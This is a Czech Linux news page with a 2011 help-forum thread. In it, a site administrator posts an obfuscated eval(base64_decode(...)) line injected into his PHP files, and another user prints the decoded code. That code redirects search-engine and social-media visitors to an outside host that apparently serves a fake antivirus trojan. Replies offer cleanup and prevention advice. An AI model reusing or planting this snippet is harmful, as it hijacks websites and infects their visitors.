Inzerujte na AbcPráce.cz od 950 Kč

napište » Zprávičky

dnes 04:11 | Komunita

Fedora je od 10. února dostupná v Sýrii. Sýrie vypadla ze seznamu embargovaných zemí a Fedora Infrastructure Team mohl odblokovat syrské IP adresy.

Ladislav Hagara | Komentářů: 7

Freedom.gov, portál pro obcházení cenzury

dnes 03:44 | Zajímavý projekt

Ministerstvo zahraničí Spojených států amerických vyvíjí online portál Freedom.gov, který umožní nejenom uživatelům v Evropě přístup k obsahu blokovanému jejich vládami. Portál bude patrně obsahovat VPN funkci maskující uživatelský provoz tak, aby se jevil jako pocházející z USA. Projekt měl být původně představen již na letošní Mnichovské bezpečnostní konferenci, ale jeho spuštění bylo odloženo.

NUKE GAZA! 🎆 | Komentářů: 3

The Book of Remind

dnes 03:33 | Komunita

Byla vydána pro lidi zdarma ke stažení kniha The Book of Remind věnovaná sofistikovanému kalendáři a připomínači Remind.

Ladislav Hagara | Komentářů: 0

LyX 2.5.0

včera 23:55 | Nová verze

Grafický editor dokumentů LyX, založený na TeXu, byl vydán ve verzi 2.5.0. Oznámení připomíná 30. výročí vzniku projektu. Novinky zahrnují mj. vylepšení referencí nebo použití barev napříč aplikací, od rozhraní editoru po výstupní dokument.

|🇵🇸 | Komentářů: 0

F-Droid upozorňuje na iniciativu Keep Android Open

včera 15:00 | Komunita

F-Droid bannerem na svých stránkách a také v aplikacích F-Droid a F-Droid Basic upozorňuje na iniciativu Keep Android Open. Od září 2026 bude Android vyžadovat, aby všechny aplikace byly registrovány ověřenými vývojáři, aby mohly být nainstalovány na certifikovaných zařízeních Android. To ohrožuje alternativní obchody s aplikacemi jako F-Droid a možnost instalace aplikací mimo oficiální obchod (sideloading).

Ladislav Hagara | Komentářů: 22

0 A.D. Release 28: Boiorix

20.2. 16:33 | Nová verze

Svobodná historická realtimová strategie 0 A.D. (Wikipedie) byla vydána ve verzi 28 (0.28.0). Její kódový název je Boiorix. Představení novinek v poznámkách k vydání. Ke stažení také na Flathubu a Snapcraftu.

Ladislav Hagara | Komentářů: 0

PipeWire 1.6.0

20.2. 04:44 | Nová verze

Multimediální server a user space API PipeWire (Wikipedie) poskytující PulseAudio, JACK, ALSA a GStreamer rozhraní byl vydán ve verzi 1.6.0 (Bluesky). Přehled novinek na GitLabu.

Ladislav Hagara | Komentářů: 1

Ubuntu Touch 24.04-1.2 a 20.04 OTA-12

20.2. 01:11 | Nová verze

UBports, nadace a komunita kolem Ubuntu pro telefony a tablety Ubuntu Touch, vydala Ubuntu Touch 24.04-1.2 a 20.04 OTA-12.

Ladislav Hagara | Komentářů: 0

AsteroidOS 2.0

19.2. 18:00 | Nová verze

Byla vydána (Mastodon, 𝕏) nová stabilní verze 2.0 otevřeného operačního systému pro chytré hodinky AsteroidOS (Wikipedie). Přehled novinek v oznámení o vydání a na YouTube.

Ladislav Hagara | Komentářů: 1

WoWee, klient pro hru World of Warcraft

19.2. 16:00 | Zajímavý software

WoWee je open-source klient pro MMORPG hru World of Warcraft, kompatibilní se základní verzí a rozšířeními The Burning Crusade a Wrath of the Lich King. Klient je napsaný v C++ a využívá vlastní OpenGL renderer, pro provoz vyžaduje modely, grafiku, hudbu, zvuky a další assety z originální kopie hry od Blizzardu. Zdrojový kód je na GitHubu, dostupný pod licencí MIT.

NUKE GAZA! 🎆 | Komentářů: 9

Centrum | Napsat | Starší

navrhněte » Anketa

Komentářů: 25, poslední 3.2. 19:50

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Poradna / Linuxová poradna / Napadnuté weby

Štítky: data, download, PHP, programování

Dotaz: Napadnuté weby

9.5.2011 12:26 dusan
Napadnuté weby

Přečteno: 562×

Odpovědět | Admin

Zdravím.

Na stránkach s príponov php, na mojom servery, mám na mnohých weboch tento kód:

eval(base64_decode("DQoNCg0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcm
VyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwi
dHdpdHRlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZX
JlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZl
cmVyLCJsaXZlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2siKSkgew0KCWlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3
RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Jpbmdvc3RhcnQub3NhLnBsLyIpOw0KCQlleGl0
KCk7DQoJfQ0KfQ0KfQ=="));

Po prekódovaní z BASE64 to je:

Binary data detected! Click 'DOWNLOAD BINARY FILE NOW' button to download file.

WARNING!!!!
===========
Be careful what you download. If the file contains a virus, you will infect your machine!!
HIT 'BACK' when done.

Predpokladám, že mám zavírené stránky. Neviete čo to je, a ako tomu predchádzať? Poprípade existuje nejaký antivír, ktorý to dokáže odvíriť? V napadnutých doménach sa to nachádza skoro v každom php súbore.

Nástroje: Začni sledovat (0) ?

Odpovědi

9.5.2011 12:31 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby

A ešte jedna vec, čo som si všimol: Zmenené súbory majú pôvodný dátum a čas.

9.5.2011 12:33 Stanislav Petr | skóre: 27 | Praha
Rozbalit Rozbalit vše Re: Napadnuté weby

Obecne informace jak postupovat najdete napriklad v napovede tady: http://www.hosting90.cz/cz/napoveda-jak-postupovat-pri-napadeni-stranek-skodlivym-kodem

Jako dalsi praventivni krok, pokud se jedna o server ktery slouzi pro zakazniky doplnit FTP server o antivir. Dobry zkusenosti mam s proftpd + mod_clamav (http://www.thrallingpenguin.com/resources/mod_clamav.htm)

Obvykle k tomuhle dochazi pomoci nahrani prez FTP kdy utocnik hesla nejcasteji ziskava z ulozenych udaju prave v aplikaci Total Commander.

No jo... Co bych cekal od systemu, kterej se vypina tlacitkem start... http://glux.org

9.5.2011 12:48 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby

Dík za info.

Ešte by ma zaujímalo, či existuje nejaký antivir ktorý by som mohol púšťať v crone, a ktorí by preskenoval vsetky domeny.

Ten kód mi nedáva zmysel. Je to len čistý text, žiadna php funkcia. Potrebujem tie stránky opraviť. Bohužiaľ sa mi weby zálohujú každý deň posledných 7 dní, MySQL posledný mesiac. Vo vecsine su zavirene aj v zalohach. Nechcem to robiť rucne, lebo ich mozem pokazit.

9.5.2011 12:53 Jakub Lucký | skóre: 40 | Praha
Rozbalit Rozbalit vše Re: Napadnuté weby

Po překódování z base64 mi vyšlo tohle:

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"twitter") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live") or stristr($referer,"facebook")) {
	if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://ringostart.osa.pl/");
		exit();
	}
}
}

If you understand, things are just as they are; if you do not understand, things are just as they are.

9.5.2011 12:57 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby

Kurva !!!

Nie som PHP programator, čo tým autor zamýšlal?

9.5.2011 13:29 Kit
Rozbalit Rozbalit vše Re: Napadnuté weby

Zkusil jsem si dát URL do browseru. Mít Windows, tak bych určitě moc klidný nebyl. Provede virtuální antivirový test a snaží se stáhnout "antivirák", tedy trojského koně.

9.5.2011 15:22 Der Teufel
Rozbalit Rozbalit vše Re: Napadnuté weby

Tenhle malware znám, odstraňoval jsem ho z několika počítačů. Hodně odolná svině. Stáhne "antimalware", který pak spouští při každém pokusu o načtení jakékoliv webové stránky, docela znepříjemní další brouzdání po netu (ukazuje furt svou webovou stránku s varováním že kvůli bezpečnosti zablokoval načítání). Samotní antimalware samozřejmě požaduje zaplacení plné verze pro odstranění "nalezených" malware a vypadá velice dobře, skvěle zapadá do systému.

9.5.2011 13:17 NN
Rozbalit Rozbalit vše Re: Napadnuté weby

V klidu je to jen presmerovani na nejakou sracku..

9.5.2011 14:44 tomvec | skóre: 24 | Kojetín
Rozbalit Rozbalit vše Re: Napadnuté weby

Ale co chudáci Widlí, co to sežerou i navijákem?

Založit nové vlákno • Nahoru

Tiskni Sdílej: